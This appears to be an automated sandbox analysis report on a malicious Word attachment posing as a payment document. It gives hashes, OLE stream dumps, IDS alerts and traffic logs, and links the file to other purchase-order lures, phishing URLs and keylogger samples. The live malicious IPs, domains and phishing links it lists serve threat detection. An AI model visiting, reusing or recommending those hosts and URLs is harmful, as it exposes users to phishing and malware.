        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.109.4.7, 20.189.173.16, 52.109.16.112, 52.111.230.27, 52.111.230.25, 52.111.230.24, 52.111.230.26, 23.39.223.132, 23.39.223.146, 52.123.128.14, 20.190.157.15, 23.205.104.9, 4.245.163.56
        • Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, scus-azsc-config.officeapps.live.com, templatesmetadata.office.net.edgekey.net, res-1.cdn.office.net, osiprod-ncus-buff-azsc-000.northcentralus.cloudapp.azure.com, prod-eus-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, mobile.events.data.microsoft.com, ncus-azsc-000.roaming.officeapps.live.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, officeclient.microsoft.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod-na.naturallanguageeditorservice.osi.office.net.akadns.net, prod.roaming1.live.com.akadns.net, onedscolprdwus17.westus.cloudapp.azure.com, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, eus2-azsc-000.odc.officeapps.live.com, prod1.natural
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Report size getting too big, too many NtSetValueKey calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        203.202.232.170NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
          NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
            NEW ORDER.docxGet hashmaliciousUnknownBrowse
              NEW ORDER.docxGet hashmaliciousUnknownBrowse
                Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                  Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                      Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                        Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                          104.21.20.196documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                            documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                              NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                GFL-001-2034-PO-BK - REV.docx.docGet hashmaliciousUnknownBrowse
                                  https://forms.microsoft.com/e/fhhfp2jwjXGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    smol.redocumenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                                    • 172.67.194.27
                                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    • 172.67.194.27
                                    GFL-001-2034-PO-BK - REV.docx.docGet hashmaliciousUnknownBrowse
                                    • 172.67.194.27
                                    GFL-001-2034-PO-BK - REV.docx.docGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    a726.dscd.akamai.netofthings.docGet hashmaliciousUnknownBrowse
                                    • 23.0.162.232
                                    91 PO.xlsmGet hashmaliciousUnknownBrowse
                                    • 23.34.82.12
                                    Fax-499584-940.xlsxGet hashmaliciousUnknownBrowse
                                    • 23.192.229.101
                                    Enquiry Rfq.docxGet hashmaliciousUnknownBrowse
                                    • 23.192.229.101
                                    RFQ-VITOOLGROUP-PURCHASE-ORDER-041725.xlsxGet hashmaliciousUnknownBrowse
                                    • 23.1.105.14
                                    documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                                    • 23.48.246.138
                                    http://transports-bourgeoiscom-064-61924.grweb.site/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 23.48.246.142
                                    https://r57q0mq.s3.us-east-1.amazonaws.com/index.html#?0088309007Family=b2xnYS53b2xhbmluQG15bWFuYXRlZS5vcmc=Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 23.48.246.142
                                    GEN_ARKASLINE_ORIGINAL_ _BL_PREVIEW.xlsGet hashmaliciousUnknownBrowse
                                    • 23.34.82.25
                                    Flowback Report Summary EN-STARLA-157-93-0904H-3 (AM Report).xlsmGet hashmaliciousUnknownBrowse
                                    • 23.34.82.12
                                    s-0005.dual-s-msedge.netrichardsewell-4-15-24.Bayer Heritage FCU BHFCU0425.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    $RCNW0Y4.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.129.14
                                    Deal Sheet & Commitment-New Deal (1).emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.128.14
                                    phish_alert_sp2_2.0.0.0.msgGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    FW Deal Sheet & Commitment-New Deal.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.128.14
                                    FW Deal Sheet & Commitment-New Deal.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.128.14
                                    1744765654-105589-7710-13114-1.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    test.docGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.129.14
                                    T-Mob1le Transcript.emlGet hashmaliciousHTMLPhisherBrowse
                                    • 52.123.129.14
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ACCESSSMART-ASAccessSmartSolutionsIndiaPvtLtdINNEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    NEW ORDER.docxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    NEW ORDER.docxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    Quotation.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 203.202.232.170
                                    CLOUDFLARENETUSnova ordem.PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 104.21.16.1
                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 104.21.64.1
                                    New Order.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                    • 104.21.96.1
                                    https://www.pestexinc.comGet hashmaliciousUnknownBrowse
                                    • 104.22.1.204
                                    https://app.filen.io/#/d/bd2b4548-5581-4bc0-8fff-fc86a5bfb9c8%23xDEj0Hlv1sPYPjhXhP6PIvu8Gj1lfVldGet hashmaliciousUnknownBrowse
                                    • 104.18.95.41
                                    richardsewell-4-15-24.Bayer Heritage FCU BHFCU0425.emlGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    http://bstrias.netGet hashmaliciousUnknownBrowse
                                    • 172.67.176.202
                                    k3.elfGet hashmaliciousUnknownBrowse
                                    • 1.13.123.23
                                    one.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    258a5a1e95b8a911872bae908152664491 PO.xlsmGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    Fax-499584-940.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    RFQ-VITOOLGROUP-PURCHASE-ORDER-041725.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    documenti_inviobolle_202503190928330337.xlsGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    PO.#LTV_100734920.xlam.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    GEN_ARKASLINE_ORIGINAL_ _BL_PREVIEW.xlsGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    Flowback Report Summary EN-STARLA-157-93-0904H-3 (AM Report).xlsmGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    NEW ORDER.docxGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    SAKL0987656700.xlsxGet hashmaliciousUnknownBrowse
                                    • 104.21.20.196
                                    No context
                                    Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):162
                                    Entropy (8bit):2.9248237852297185
                                    Encrypted:false
                                    SSDEEP:3:blRmMY+09cKbl6X/flY/iX0YlDQbVDxV:bzmMYfV+X9yP
                                    MD5:CA01F3422AF79CF624468FD8F544B361
                                    SHA1:E2FF2FF699F8CA54E0B572A59659E9412FC07CC6
                                    SHA-256:434628A199AA79698450CDDE5ECE14B2EB32FB7D2EE7D4DC0820199750A34C6E
                                    SHA-512:982495E3092D138AFAA5075FED0F52FE1E696D12366EB318269E703443F8E354976259ED791E8A845A7B4C353FACDE7F2A54E22597FAFE07CF6B678F705728A9
                                    Malicious:false
                                    Reputation:low
                                    Preview:.user..................................................M.a.o.g.a.........y....9......9.....H.......................H.......S./....&.Q.....XD.1............6..<
                                    File type:Microsoft Word 2007+
                                    Entropy (8bit):7.965934074424309
                                    TrID:
                                    • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                    • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                    • ZIP compressed archive (8000/1) 9.41%
                                    File name:FFL-2025-00947 PAYMENT.docx.doc
                                    File size:57'160 bytes
                                    MD5:78a0ad27916c36ecee03aa248e3f419a
                                    SHA1:742d6c84bb558d2a759a35af2588bf35d6f8bd13
                                    SHA256:8ecb35498bed6edbe4bd53ce6d9cd46ef2bead452af5f407a6b65a5e0640591d
                                    SHA512:b9f59503836cdd0bba04fc5e0e893114880abe073ee44d25ef431875b75910f44d91cea65b2099a66c142bf2a27cff580a55925ab9ac90b7c7022bbf890fcef8
                                    SSDEEP:1536:lCwOyeJcM4ZeFbBxK7TLtMSrbz7USCwO6H+m35iweb9j:lCwOyeWMoepWd58yH+oneb9j
                                    TLSH:9F43E066751504C1C71EC67A9706A568FA8CB28EC7AFF271137877FC4EBB4ED4A02184
                                    File Content Preview:PK...........Z..K.............[Content_Types].xmlUT....2.h.2.h.2.h..]K.0.....C..h.M..u^.q......t.6.$G...'..2.:...BI..y.9i..Uc...B...lT.Y.V:...d.....e..U.v.J......'...C.Hmc......(.`D,..K+..F ..9.B..9..px.....sL.l:y..A+..E.{a..?\P.r..C.......%t......)8..j..
                                    Icon Hash:35e1cc889a8a8599
                                    Document Type:OpenXML
                                    Number of OLE Files:1
                                    Has Summary Info:
                                    Application Name:
                                    Encrypted Document:False
                                    Contains Word Document Stream:True
                                    Contains Workbook/Book Stream:False
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:False
                                    Code Page:1252
                                    Title:
                                    Subject:
                                    Author:91974
                                    Keywords:
                                    Template:Normal.dotm
                                    Last Saved By:91974
                                    Revion Number:2
                                    Total Edit Time:0
                                    Last Printed:2024-11-08 04:15:17
                                    Create Time:2025-04-16T00:41:00Z
                                    Last Saved Time:2025-04-16T00:41:00Z
                                    Number of Pages:1
                                    Number of Words:0
                                    Number of Characters:0
                                    Thumbnail:0&" WMFC #ClOb EMFC)8X?F, EMF+@xxF\PEMF+"@@$@0@?!@@!"!"!"!P"!P"!P'%&%"6"%Ld"""!??%6#%Ld""!??%,6#,%Ld,",,"!??%I6#I%LdI"II"!??%_6#_%Ld_"__"!??%u6#u%Ldu"uu"!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%6#%Ld""!??%"6P%Ld"O".!??%"6"%Ld"""!??%C6C%LdCCC!??%6%Ld!??%O6O%LdOOO!??'%Ld!!!??%%6"%Ld!!!??%6%Ld!??'%(&%6"%Ld! !??%6%Ld!??'%(&%6"%Ld! !??%!6!%Ld!!!!??!bK!;$$==V(X(($$AA<C%'%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%('%%V0%%(%""RpArialv;xW%lu-aRlu`W`RxW/YW/YPZW{/YluO/YYI/ Y)I/%j";j"/k3Xv9YuXudv%'A>TT+UUA&ALP1TT6HUUA&A6LP2TTL^UUA&ALLP3TTbtUUA&AbLP4TTwUUA&AwLP5TTUUA&ALP6TTUUA&ALP7TTUUA&ALP8TT.8UUA&A.LPATTUUA&ALPBTTUUA&ALPC%%"!%'A>#PRp Arialv;%lu<aRlu`R/!/!!{/!uO/! I/ !L>I/%N;Na#/Mzdv9t &" WMFC Cudv%Rp Arialv;!luftaRlu`R/!/!!{/!uO/! I/ !\dI/%J;Ja#/Izdv9t udv%T|GL^UUA&AGLL\Exporter'%LdG]^G]E!??%Rp Arialv;%lu-aRlu`R/!/!!{/!uO/! I/ !dI/%K;Ka#/Jzdv9t udv%TGbOtUUA&AGbLJAI LARA DRUGS PRIVATE LIMITEDRp Arialv;%lu-aRlu\C`R/\C!\C/!\C!{/!uO/! I/ !bI/%H;Ha#/Gzdv9t \Cu\Cdv%THGwOUUA&AGw*LCor.Off: "LARA HOUSE " D.NO.:5-5-35/259/2,TtGOUUA&AG1LOPP.KIDZEE SCHOOL,PLOT No.:55, MAITRINAGAR COLONYTGUUA&AGLx(BACKSIDE METRO MALL)T\GOUUA&AG-LKUKATPALLY,HYDERABAD-500072, TELANGANA, INDIA%(%%%"!%D-PITxUUA&AQ.L\INVOICE%%%"!%#P%"!%P'%(&%",6C,%Ld",B,",!!??%C6C,%LdCC+C!??%"I6CI%Ld"IBI"I!!??%6,%Ld+!??%O6O,%LdOO+O!??%"_6C_%Ld"_B_"_!!??%"u6Cu%Ld"uBu"u!!??%"6C%Ld"B"!!??%"6C%Ld"B"!!??%OJ6O`%LdOJO_OJ!??%"6C%Ld"B"!!??%"6C%Ld"B"!!??%J6`%LdJ_J!??%O6O%LdOOO!??%"6"%Ld"""!??'%(&%C,6C%LdC,CC,!??%((&%6%Ld!??%O6O%LdO!??%"6Q%Ld"O"/!??'%(&%D,6Q,%LdD,O,D,!??%DI6QI%LdDIOIDI!??%((&%D_6Q_%LdD_O_D_!??%Du6Qu%LdDuOuDu!??%D6Q%LdDOD!??%D6Q%LdDOD!??%D6Q%LdDOD!??%D6Q%LdDOD!??&WMFCC%%"!%#P%"!%P'%(&%6P%LdOP!??%6%Ld!??%"Q|OP(xP( F4(EMF+*@$??FEMF+@P''',P',P',P--""-@!"-#-@!"-,,#-@!",-II#-@!"I-__#-@!"_-uu#-@!"u-#-@!"-#-@!"-#-@!"-#-@!"-"P-@!."-""-@!"-CC-@!C--@!-OO-@!O-@!!--"-@!!--@!--"-@! --@!--"-@! -!!-@!!,---$----$----$----$----$----$----$----$----$----$----$----$----$----$---''Arial-'A>212622L32b42w52627282.A2B2C-"System-'-'A>,P# Arial- Arial-2LGExporter-@!E]G- Arial-42bGJAI LARA DRUGS PRIVATE LIMITED Arial-F2wG*Cor.Off: "LARA HOUSE " D.NO.:5-5-35/259/2,Q2G1OPP.KIDZEE SCHOOL,PLOT No.:55, MAITRINAGAR COLONY'2G(BACKSIDE METRO MALL)K2G-KUKATPALLY,HYDERABAD-500072, TELANGANA, INDIA----'-,IP-D2.QINVOICE---'-,P#-'-,P--,",C-@!!,"-C,C-@!C-I"IC-@!!I"-,-@!-O,O-@!O-_"_C-@!!_"-u"uC-@!!u"-"C-@!!"-"C-@!!"-JO`O-@!JO-"C-@!!"-"C-@!!"-J`-@!J-OO-@!O-""-@!"--,CC-@!,C---@!-OO-@!O-"Q-@!/"--,D,Q-@!,D-IDIQ-@!ID--_D_Q-@!_D-uDuQ-@!uD-DQ-@!D-DQ-@!D-DQ-@!D-DQ-@!D--'-,P#-'-,P--P-@!P--@!-'#AP(
                                    Creating Application:Microsoft Office Word
                                    Security:0
                                    Document Code Page:1252
                                    Number of Lines:1
                                    Number of Paragraphs:1
                                    Thumbnail Scaling Desired:false
                                    Company:Grizli777
                                    Contains Dirty Links:false
                                    Shared Document:false
                                    Changed Hyperlinks:false
                                    Application Version:12.0000
                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:20
                                    Entropy:0.5689955935892812
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x3EPRINT
                                    CLSID:
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Stream Size:56832
                                    Entropy:3.196382270410016
                                    Base64 Encoded:False
                                    Data ASCII:. . . . l . . . . . . . . . . . ! . . . . . . . . . . . . . T . . ! q . . E M F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:01 00 00 00 6c 00 00 00 a9 00 00 00 00 00 00 00 00 21 00 00 c2 1a 00 00 00 00 00 00 00 00 00 00 54 8c 00 00 21 71 00 00 20 45 4d 46 00 00 01 00 00 de 00 00 fc 05 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                                    General
                                    Stream Path:\x3ObjInfo
                                    CLSID:
                                    File Type:data
                                    Stream Size:6
                                    Entropy:1.2516291673878228
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . .
                                    Data Raw:00 00 03 00 0d 00
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:356
                                    Entropy:3.7776304393687803
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . 4 . . . . . . . . . . . P . . . . . . . X . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H E T R O D R U G S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V O I C E . . . . . P K G L I S T . . . . . S h e e t 1 . . . . . I N V O I C E ! P r i n t _ A r e a . . . . . ' P K
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 34 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 6c 00 00 00 0b 00 00 00 74 00 00 00 10 00 00 00 7c 00 00 00 13 00 00 00 84 00 00 00 16 00 00 00 8c 00 00 00 0d 00 00 00 94 00 00 00 0c 00 00 00 f1 00 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:25116
                                    Entropy:3.0683208466933096
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . a . . . . . . . . . . P . . . . . . . X . . . . . . . l . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . S . R E D D Y . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . x . . 1 . @ . . . . . . . @ . . . < N h . . . . . . . . . G . . . $ a . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . & . . . "
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ec 61 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 6c 00 00 00 12 00 00 00 7c 00 00 00 0b 00 00 00 94 00 00 00 0c 00 00 00 a0 00 00 00 0d 00 00 00 ac 00 00 00 13 00 00 00 b8 00 00 00 11 00 00 00 c0 00 00 00
                                    General
                                    Stream Path:Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:49884
                                    Entropy:3.9936426036867276
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . x . . $ ` . 9 . . . . . . . Y . @ . . . . . . . . . . " . . . . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                    Download Network PCAP: filteredfull

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-04-18T06:56:09.820739+02001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.2460828104.21.20.196443TCP
                                    2025-04-18T06:56:12.160852+02001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.2460832104.21.20.196443TCP
                                    2025-04-18T06:56:12.681332+02001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.2460834203.202.232.17080TCP
                                    • Total Packets: 105
                                    • 443 (HTTPS)
                                    • 80 (HTTP)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 18, 2025 06:56:08.153825998 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.153873920 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.153928041 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.154412031 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.154433012 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.371977091 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.372261047 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.467639923 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.467668056 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.468061924 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.470716000 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.512279987 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.957946062 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.958084106 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:08.958147049 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.959454060 CEST60827443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:08.959475040 CEST44360827104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.004196882 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.004260063 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.004326105 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.005765915 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.005785942 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.217961073 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.218029976 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.219425917 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.219440937 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.220341921 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.220402002 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.221816063 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.221879959 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.221920013 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.221927881 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.221962929 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.225073099 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.272269964 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.820750952 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.820820093 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.820833921 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.820910931 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.820935965 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.821002960 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.824924946 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.824938059 CEST44360828104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.824951887 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.824991941 CEST60828443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.869139910 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.869194031 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:09.869272947 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.869523048 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:09.869539022 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.083878040 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.084559917 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:10.084584951 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.085078955 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:10.085083008 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.690697908 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.690766096 CEST44360829104.21.20.196192.168.2.24
                                    Apr 18, 2025 06:56:10.690839052 CEST60829443192.168.2.24104.21.20.196
                                    Apr 18, 2025 06:56:10.693094969 CEST60829443192.168.2.24104.21.20.196
